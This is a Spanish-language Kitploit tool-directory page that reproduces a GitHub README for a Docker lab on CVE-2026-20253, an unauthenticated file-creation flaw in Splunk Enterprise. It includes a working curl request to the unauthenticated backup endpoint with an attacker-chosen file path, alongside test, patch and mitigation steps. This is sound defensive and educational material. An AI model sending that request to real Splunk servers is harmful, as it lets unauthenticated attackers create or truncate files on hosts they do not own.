Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20253 — PoC para CVE-2026-20253 | Kitploit
Herramientas/GitHubGitHub/pssec-io/cve-2026-20253
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubpssec-io/cve-2026-20253

CVE-2026-20253

PoC para CVE-2026-20253

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-20253 — Laboratorio de RCE sin autenticación previa en Splunk Enterprise

Creación y truncado arbitrario de archivos sin autenticación a través del sidecar de PostgreSQL
CVSS 9.8 · Crítico · CWE-306 · Explotado activamente (CISA KEV)


⚠️ Aviso legal

Este repositorio está destinado estrictamente a fines educativos y de investigación de seguridad autorizada.
Todas las pruebas deben realizarse contra infraestructura que poseas o para la que tengas permiso explícito por escrito.
Los autores no aceptan ninguna responsabilidad por el uso indebido de las técnicas o herramientas aquí demostradas.
Nunca ejecutes esto contra sistemas de producción o entornos que no poseas.


Resumen

CVE-2026-20253 afecta a versiones de Splunk Enterprise anteriores a 10.2.4 y 10.0.7.
El servicio sidecar de PostgreSQL incluido con Splunk expone dos endpoints HTTP internos:

root@kitploit:~
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore

Ambos endpoints carecen de cualquier verificación de autenticación (CWE-306), lo que significa que cualquier atacante con acceso a la red puede invocarlos sin credenciales. Al proporcionar un parámetro backupFile controlado por el atacante, un usuario no autenticado puede crear o truncar archivos arbitrarios en el sistema de archivos del host Splunk — una primitiva que los investigadores han encadenado para lograr Ejecución Remota de Código completa sin autenticación previa.


Estructura del repositorio

root@kitploit:~
.
├── Dockerfile                  # Imagen vulnerable (splunk 10.2.3)
├── docker-compose.yml          # Contenedor vulnerable en el puerto 8000
├── patched.Dockerfile          # Imagen parcheada (splunk 10.2.4)
├── patched-docker-compose.yml  # Contenedor parcheado en el puerto 8001
└── instructions                # Referencia rápida de comandos

Requisitos previos

  • Docker + Docker Compose v2
  • ~6 GB de espacio libre en disco (la imagen de Splunk es grande)
  • Kali Linux o cualquier host Linux con curl disponible

Uso

Iniciar la instancia vulnerable (puerto 8000)

root@kitploit:~
docker compose -f docker-compose.yml up -d --build

Espera ~90 segundos para que Splunk se inicialice completamente. Sigue el progreso con:

root@kitploit:~
docker compose -f docker-compose.yml logs -f
# Ready when you see: "Ansible playbook complete"

Interfaz web de Splunk → http://localhost:8000
Credenciales: admin / changeme


Iniciar la instancia parcheada (puerto 8001)

root@kitploit:~
docker compose -f patched-docker-compose.yml up -d --build

Interfaz web de Splunk → http://localhost:8001
Credenciales: admin / changeme

Ambos contenedores pueden ejecutarse simultáneamente: los puertos están desplazados para evitar conflictos.


Pruebas

Probar instancia vulnerable → se espera HTTP 400

root@kitploit:~
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Esperado: 400 — el endpoint existe, no se aplicó autenticación, la solicitud fue procesada.

Verifica que el archivo se haya creado dentro del contenedor:

root@kitploit:~
docker exec splunk-cve-2026-20253 ls -la /tmp/poc

Probar instancia parcheada → se espera HTTP 401

root@kitploit:~
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Esperado: 401 — ahora se aplica autenticación, la solicitud fue rechazada.


Referencia de códigos de respuesta

Estado HTTP

Opcional: escáner de watchTowr

El equipo de watchTowr Labs publicó un script de detección que automatiza la verificación anterior:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000

Detener el laboratorio

root@kitploit:~
# Stop vulnerable
docker compose -f docker-compose.yml down

# Stop patched
docker compose -f patched-docker-compose.yml down

Mitigación

Actualiza a una versión corregida de inmediato:

RamaVersión corregida
10.2.x10.2.4
10.0.x10.0.7

Si no puedes aplicar el parche de inmediato, deshabilita el sidecar de PostgreSQL agregando lo siguiente a server.conf y reiniciando Splunk:

root@kitploit:~
[postgres]
disabled = true

⚠️ No deshabilites el sidecar si estás ejecutando Edge Processor o pipelines de datos SPL2 — es necesario para esas funciones.


Referencias

  • 🔴 Aviso oficial de Splunk — SVD-2026-0603
  • 🔬 Investigación y herramienta de detección de watchTowr Labs — github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • 📋 Entrada CISA KEV — cisa.gov/known-exploited-vulnerabilities-catalog
  • 📰 Artículo de The Hacker News — Fallo crítico en Splunk Enterprise permite a atacantes ejecutar código sin autenticación

Legal

Este entorno de laboratorio se proporciona solo para investigación de seguridad defensiva y educación.
El acceso no autorizado a sistemas informáticos es ilegal según la Computer Fraud and Abuse Act (CFAA), la UK Computer Misuse Act y la legislación equivalente a nivel mundial.
Úsalo de manera responsable.

Descargar herramienta
PropiedadDetalle
CVECVE-2026-20253
Puntuación CVSS9.8 (Crítico)
CWECWE-306 — Falta de autenticación para función crítica
AfectaSplunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4
Corregido en10.0.7, 10.2.4
CISA KEVAgregado el 18 de junio de 2026
Significado
400Vulnerable — endpoint alcanzado, sin verificación de autenticación
401Parcheado — autenticación aplicada
404Sidecar no presente / ruta incorrecta
000Contenedor aún no listo